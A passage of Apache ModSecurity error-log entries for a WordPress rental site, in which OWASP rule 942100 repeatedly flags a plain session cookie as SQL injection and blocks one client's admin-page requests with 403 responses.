"agIFPQ-Qm4vhlWBPlMjm8gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:09.909400 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFPQ-Qm4vhlWBPlMjm8gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:10.287609 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFPQ-Qm4vhlWBPlMjm8gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:10.572115 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFPg-Qm4vhlWBPlMjm8wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:10.572413 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFPg-Qm4vhlWBPlMjm8wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:11.190351 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFPg-Qm4vhlWBPlMjm8wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:11.463858 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFPw-Qm4vhlWBPlMjm9wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:11.464141 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFPw-Qm4vhlWBPlMjm9wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:12.058672 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFPw-Qm4vhlWBPlMjm9wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:12.330251 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFQA-Qm4vhlWBPlMjm-wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:12.330541 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFQA-Qm4vhlWBPlMjm-wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:12.967246 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFQA-Qm4vhlWBPlMjm-wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:13.245152 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFQQ-Qm4vhlWBPlMjm_gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:13.245439 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFQQ-Qm4vhlWBPlMjm_gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:13.811299 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFQQ-Qm4vhlWBPlMjm_gAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:13.931690 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFQQ-Qm4vhlWBPlMjm_wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:13.931976 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFQQ-Qm4vhlWBPlMjm_wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:14.507790 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFQQ-Qm4vhlWBPlMjm_wAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:14.644768 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFQg-Qm4vhlWBPlMjnAQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:14.645074 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agIFQg-Qm4vhlWBPlMjnAQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:15.037064 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFQg-Qm4vhlWBPlMjnAQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:15.276804 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFQw-Qm4vhlWBPlMjnAgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:15.277133 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agIFQw-Qm4vhlWBPlMjnAgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:16.139391 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFQw-Qm4vhlWBPlMjnAgAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:16.462096 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFRA-Qm4vhlWBPlMjnBAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:16.462398 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agIFRA-Qm4vhlWBPlMjnBAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:17.174124 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFRA-Qm4vhlWBPlMjnBAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:17.471839 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFRQ-Qm4vhlWBPlMjnBQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:17.472135 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agIFRQ-Qm4vhlWBPlMjnBQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:18.085656 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFRQ-Qm4vhlWBPlMjnBQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:18.316648 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFRg-Qm4vhlWBPlMjnCAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:18.316929 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agIFRg-Qm4vhlWBPlMjnCAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:18.863985 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFRg-Qm4vhlWBPlMjnCAAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:19.023908 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: d35e4f7ff7362245a5f14231bf8ffc1b||1778518709||1778518349"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFRw-Qm4vhlWBPlMjnCQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:19.024210 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agIFRw-Qm4vhlWBPlMjnCQAAAAc"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 18:35:19.586489 2026] [security2:error] [pid 1411099:tid 1411108] [client 31.57.184.104:63721] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agIFRw-Qm4vhlWBPlMjnCQAAAAc"], referer: https://rentparadise.fr/wp-login.php
